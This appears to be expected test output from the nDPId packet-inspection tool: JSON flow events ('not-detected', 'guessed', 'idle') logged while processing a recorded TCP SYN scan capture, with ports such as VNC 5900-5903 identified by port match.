-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 